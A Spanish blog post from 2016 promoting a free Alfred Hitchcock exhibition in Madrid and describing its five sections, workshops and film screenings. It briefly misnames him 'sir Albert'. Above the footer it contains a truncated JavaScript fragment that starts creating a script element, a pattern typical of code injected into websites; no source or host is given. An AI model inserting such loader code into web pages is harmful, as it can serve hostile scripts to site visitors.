Hitchcock, más allá del suspense

21/10/2016

Alfred Hitchcock Presents

Alfred Hitchcock, o, lo que es lo mismo, el rey del suspense tiene nueva casa. Es temporal. Lo será solo hasta el próximo 5 de febrero. Pero mientras lo es, ¿qué tal si le hacemos una visita? A un pasito de la Gran Vía madrileña y dentro del Espacio Fundación Telefónica. No tiene pérdida.

Se trata de una exposición, de acceso gratuito, que tiene como protagonista a Hitchcock. Pablo Lorca es su comisario. Y sobra decir que el objetivo de Lorca es fundamentalmente homenajear y halagar la genialidad del cineasta, incluso descubrir ciertos aspectos menos conocidos del autor.  Y es que Hitchcock fue, es y será mucho Hitchcock… Hace un tiempo aquí íbamos tras sus pasos en California.

La muestra nos permitirá adentrarnos un poco más en la trayectoria tanto personal como profesional del genio. Veremos sus iconos cinematográficos. Disfrutaremos con sus trampantojos visuales tanto como el cineasta disfrutaba utilizándolos en sus películas. Entenderemos su manera de proceder para conseguir romper los códigos de censura de antaño. Y conoceremos sus habilidades a la hora de promocionar sus cintas. Haremos todo esto en el transcurso de las cinco secciones en las que la exposición está dividida. Fotogramas, secuencias de películas, bocetos, vestuario y demás repartidos en:

  1. Introducción.
  2. El toque Hitchcock.
  3. Mujeres y Hombres.
  4. Hitchcock y su tiempo, el arte y la arquitectura.
  5. El revés de la cámara: Hitchcock, las apariencias y los trucos.

La guinda del pastel a todo esto la ponen los talleres temáticos sobre el cine de suspense que se irán organizando y las proyecciones de películas del rey del suspense.

Es una buena oportunidad para conocer a fondo a sir Albert. Ese anglosajón con dotes de genio que marcó un antes y un después en el desarrollo de cintas de suspense y en la industria cinematográfica de todos los tiempos.

Foto | Insomnia Cured Here

var d=document;var s=d.createElement(‘script’);

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO